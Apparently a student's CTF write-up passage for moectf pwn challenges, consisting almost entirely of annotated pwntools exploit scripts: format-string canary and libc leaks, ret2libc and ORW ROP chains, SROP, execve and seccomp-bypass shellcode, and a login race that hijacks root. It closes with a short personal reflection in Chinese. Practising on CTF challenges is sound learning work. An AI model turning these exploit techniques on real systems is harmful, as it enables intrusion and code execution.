payload = b'a'*0x28 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
io.send(payload)

io.interactive()

0x1a fmt_canary

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "8.147.132.32", 16586
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# Format-string read of two stack slots: argument 11 is the canary and
# argument 33 is a return address inside __libc_start_main (+128).
payload = b'%11$p%33$p'
io.sendline(payload)

io.recvuntil(b'0x')
canary = int(io.recv(16), 16)  # full 64-bit canary
io.recvuntil(b'0x')
leak_addr = int(io.recv(12), 16)  # 12 hex digits = 48-bit address
libc_base = leak_addr - 128 - libc.sym['__libc_start_main']
log.info("libc_base --> "+hex(libc_base))
log.info("canary --> "+hex(canary))

system = libc_base + libc.sym['system']
# NOTE(review): str needle; other scripts on this page pass b'/bin/sh'.
binsh = libc_base + next(libc.search('/bin/sh'))
pop_rdi_ret = libc_base + 0x2a3e5  # gadget offset inside this libc build (page-provided)
ret = pop_rdi_ret + 1

# Ends the format-string loop (the program presumably stops on "end").
io.sendline(b'end')

# 0x28 bytes of padding, the canary twice (canary slot and saved rbp),
# then pop rdi ; ret -> "/bin/sh" -> ret -> system.
payload = b'a'*0x28 + p64(canary)*2 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
io.sendline(payload)

io.interactive()

0x1b input_function

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "39.106.48.123", 13668
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# Short execve("/bin//sh", NULL, NULL) stub: 0x68732f2f6e69622f is
# "/bin//sh" in little-endian; 59 is the execve number; cdq clears edx
# (rdx) from the small positive eax.
shellcode = asm('''
xor rsi, rsi
push rsi
mov rdi, 0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov al, 59
cdq
syscall
''')

io.send(shellcode)

io.interactive()

0x1c input_small_function

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "47.94.87.199", 22770
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# Same execve("/bin//sh") stub as input_function minus the `xor rsi, rsi`,
# so it relies on rsi already being zero when the shellcode runs.
shellcode = asm('''
push rsi
mov rdi, 0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov al, 59
cdq
syscall
''')

io.send(shellcode)

io.interactive()

0x1d int_bug

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "8.147.132.32", 19832
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# Send "1" twice per round, 0x7fff rounds; the challenge name suggests a
# counter that wraps once it crosses the signed 16-bit limit (not verified here).
for _ in range(0x7fff):
    io.sendline(b'1')
    io.sendline(b'1')

io.interactive()

0x1e noshell

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: unpatched binary this time, libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "47.94.87.199", 24869
filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)

# 0x00000000004013f3 : pop rdi ; ret
# 0x00000000004013f7 : pop rdx ; ret
# 0x00000000004013f5 : pop rsi ; ret
# 0x000000000040101a : ret

pop_rdi_ret = 0x4013f3
pop_rsi_ret = 0x4013f5
pop_rdx_ret = 0x4013f7
ret = 0x40101a  # not used below
open_addr = elf.plt['open']
write_addr = elf.plt['write']
read_addr = elf.plt['read']

rw = 0x404800       # writable scratch area in the binary used as the read buffer
#flag = 0x402034
flag = 0x40206a     # address of the flag path string inside the binary

# open(flag, 0) ; read(5, rw, 0x100) ; write(1, rw, 0x100). The descriptor 5
# is hard-coded: it assumes the opened file gets fd 5 on the target.
payload = b'a'*0x28 + p64(pop_rdi_ret) + p64(flag) + p64(pop_rsi_ret) + p64(0) + p64(open_addr) +\
p64(pop_rdi_ret) + p64(5) + p64(pop_rsi_ret) + p64(rw) + p64(pop_rdx_ret) + p64(0x100) + p64(read_addr) +\
p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(rw) + p64(pop_rdx_ret) + p64(0x100) + p64(write_addr)

# Menu navigation before the overflowing input.
io.recvuntil(b'something?')
io.sendline(b'n')
io.recvuntil(b'flag?')
io.sendline(b'2')
io.recvuntil(b'choice:')
io.sendline(b'2')
io.recvuntil(b'choice:')
io.sendline(b'1')
io.recvuntil(b'something')
io.send(payload.ljust(0x100, b'\x00'))  # padded to the full read size

io.interactive()

0x1f only_read

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "8.147.132.32", 25201
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given (breaks in vuln here).
gs = """
b vuln
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# Addresses inside the challenge binary (page-provided).
sigret = 0x401366       # sets rax for rt_sigreturn, then syscall (inferred from use)
syscall_ret = 0x40136d
main = 0x401373         # not used below
rw = 0x404000           # writable area used as a fake stack
leave_ret = 0x401360
call_read = 0x401349

# Frame 1: open("./flag", 0, 0) via sigreturn, continuing on a fake stack at rw+0x800-0x10.
sigFrame = SigreturnFrame()
sigFrame.rax = 2
sigFrame.rdi = rw + 0x800 + 0x10   # where the "./flag" string lands (see payload below)
sigFrame.rsi = 0
sigFrame.rdx = 0
sigFrame.rip = syscall_ret
sigFrame.rsp = rw + 0x800 - 0x10
sigFrame.rbp = rw + 0x600

log.info("frame len --> "+hex(len(sigFrame)))
log.info("sigframe --> "+hexdump(sigFrame))

# Send 1: 0x10 padding, saved rbp = rw+0x800, return into the read() call so
# the next input is read relative to the new rbp (stack pivot).
payload = b'a'*0x10 + p64(rw + 0x800) + p64(call_read)
io.send(payload.ljust(0x100, b'\x00'))

# Send 2: read again, then sigreturn; the frame is trimmed (bytes 0x18..-8)
# so that it lines up with the registers already on the fake stack.
payload = p64(call_read) + p64(sigret) + p64(rw + 0x800 - 0x10) + p64(leave_ret) + b'./flag\x00\x00' + bytes(sigFrame)[0x18:-0x8]
io.send(payload.ljust(0x100, b'\x00'))

# Frame 2: sendfile(1, 3, NULL, 0x100) (syscall 40) — assumes the opened file got fd 3.
sigFrame = SigreturnFrame()
sigFrame.rax = 40
sigFrame.rdi = 1
sigFrame.rsi = 3
sigFrame.rdx = 0
sigFrame.r10 = 0x100
sigFrame.rip = syscall_ret

log.info("frame len --> "+hex(len(sigFrame)))
log.info("sigframe --> "+hexdump(sigFrame))

# Send 3: pivot to rw+0x600-0x10 and sigreturn into the second frame.
payload = p64(rw) + p64(sigret) + p64(rw + 0x600 - 0x10) + p64(leave_ret) + bytes(sigFrame)[0x10:-0x8]
io.send(payload.ljust(0x100, b'\x00'))

io.interactive()

0x20 overflow

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "8.147.132.32", 39380
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# 0x100 bytes of padding, a filler saved rbp, then the return address 0x401222.
payload = b'a'*0x100 + p64(0xdeadbeef) + p64(0x401222)
io.sendline(payload)

io.interactive()

0x21 pwndoor

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "8.147.132.32", 42958
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# The only input is the numeric value the author found; the binary is not shown here.
io.sendline(b'7038329')

io.interactive()

0x22 sandbox_plus

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "39.106.48.123", 22398
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given (PIE-relative breakpoint).
gs = """
b *$rebase(0x139a)
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# Open/read/write without the usual open(2)/read(2)/write(2) numbers:
#   openat(AT_FDCWD=-100, "flag", 0, 0)  -> syscall 257
#   pread64(fd, rsp, 0x100, 0)           -> syscall 17
#   writev(1, iov{buf, 0x100}, 1)        -> syscall 20
# 0x67616c66 is "flag" little-endian; the NUL-terminated string sits on the stack.
shellcode = asm('''
mov rdi, -100
push 0x0000000067616c66
mov rsi, rsp
xor rdx, rdx
xor r10, r10
push 257
pop rax
syscall
push rax
pop rdi
sub rsp, 0x100
push rsp
pop rsi
push 0x100
pop rdx
xor r10, r10
push 17
pop rax
syscall
push 1
pop rdi
mov rsi, rsp
push 0x100
push rsi
mov rsi, rsp
push 1
pop rdx
push 20
pop rax
syscall
nop
nop
nop
''')

io.recvuntil(b'please input a orw_plus function (also also after compile)')
io.send(shellcode)

io.interactive()

0x23 syscall

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: 32-bit target this time, i386 libc build, remote endpoint.
context(os='linux', arch='i386', log_level='debug')

host, port = "39.106.48.123", 42840
filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/i386/libc6_2.35-0ubuntu3.10_i386/lib/i386-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given (breaks in func).
gs = """
b func
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# Gadgets inside the static 32-bit binary (page-provided).
pop_eax_ret = 0x080b438a
pop_ebx_ret = 0x08049022
pop_ecx_ret = 0x0804985a
pop_edx_ret = 0x0804985c
# 0x08090955 : xor eax, eax ; mov dword ptr [ebx], ecx ; add esp, 4 ; pop ebx ; pop esi ; ret
magic = 0x080507cf
# 0x080507c9 : xor ecx, ecx ; rdsspd ecx ; mov dword ptr [edx + 0x28], ecx ; ret
# 0x080507cf : mov dword ptr [edx + 0x28], ecx ; ret
syscall = 0x0806475d   # not used below
int_80 = 0x08049c0a
rw = 0x80ed000         # writable area that receives the "/bin/sh" string

# Earlier attempt using the [ebx] write gadget, kept by the author for reference.
#payload = b'a'*(0x12+4) + p32(pop_ebx_ret) + p32(rw) + p32(pop_ecx_ret) + b'/bin' + p32(magic) + p32(0) + p32(rw + 4) + p32(0) +\
# p32(pop_ecx_ret) + b'/sh\x00' + p32(magic) + p32(0) + p32(rw) + p32(0) +\
# p32(pop_eax_ret) + p32(0xb) + p32(pop_ecx_ret) + p32(0) + p32(pop_edx_ret) + p32(0) + p32(int_80)

# Two 4-byte stores through `mov [edx+0x28], ecx` (edx = rw-0x28 so the write
# lands at rw), then execve("/bin/sh", 0, 0): eax=0xb, ebx=rw, ecx=edx=0, int 0x80.
payload = b'a'*(0x12+4) + p32(pop_edx_ret) + p32(rw - 0x28) + p32(pop_ecx_ret) + b'/bin' + p32(magic) +\
p32(pop_edx_ret) + p32(rw - 0x28 + 4) + p32(pop_ecx_ret) + b'/sh\x00' + p32(magic) +\
p32(pop_eax_ret) + p32(0xb) + p32(pop_ebx_ret) + p32(rw) + p32(pop_ecx_ret) + p32(0) + p32(pop_edx_ret) + p32(0) + p32(int_80)

log.info("len --> "+hex(len(payload)))
io.recvuntil(b'guys')
io.send(payload.ljust(100, b'\x00'))  # padded to the 100-byte read

io.interactive()

0x24 小明的问题

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "39.106.48.123", 38828
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


# Three concurrent sessions against the same service (the bug is a race
# between sessions, so a single connection is not enough).
io1 = start()
io2 = start()
io3 = start()

# pwn :)

# io1: register an ordinary user.
io1.recvuntil(b'Please select your operation:')
io1.sendline(b'1')
io1.recvuntil(b'username:')
io1.sendline(b'r3t2')
io1.recvuntil(b'password')
io1.sendline(b'123')

# io1 and io2 both log in as that user.
io1.recvuntil(b'Please select your operation:')
io1.sendline(b'2')
io1.recvuntil(b'username:')
io1.sendline(b'r3t2')
io1.recvuntil(b'password')
io1.sendline(b'123')

io2.recvuntil(b'Please select your operation:')
io2.sendline(b'2')
io2.recvuntil(b'username:')
io2.sendline(b'r3t2')
io2.recvuntil(b'password')
io2.sendline(b'123')

# io1 and io2 unregister at the same time so that user_count underflows and
# the initial root entry gets overwritten (author's description). The
# interleaving below is timing-dependent and may need a retry.
io2.recvuntil(b'Please select your operation:')
io1.recvuntil(b'Please select your operation:')
io1.sendline(b'3')
io2.sendline(b'3')
io1.recvuntil(b'username:')
io2.recvuntil(b'username:')
io2.sendline(b'r3t2')
io1.sendline(b'r3t2')
io1.recvuntil(b'password')
io2.recvuntil(b'password')
io1.sendline(b'123')
io2.sendline(b'123')

# io3: register a user named root with a known password.
io3.recvuntil(b'Please select your operation:')
io3.sendline(b'1')
io3.recvuntil(b'username:')
io3.sendline(b'root')
io3.recvuntil(b'password')
io3.sendline(b'123')

io3.interactive()

0xff

原来已经一年了,moectf也算是见证了笔者这一年的变化,看到平台还留存着自己的参赛记录
学校的新生赛也刚刚结束,25级的新师傅们很有天赋和潜力,回想起自己去年新生赛的时候什么都不会,却也坚持每天到线下,也算勤能补拙吧哈哈
本人笔拙,写不出富含情感的文字,许多感受也写不太出来,最后就祝WHUCTF/DAWN越来越好,祝看到最后的师傅们天天向上!
以上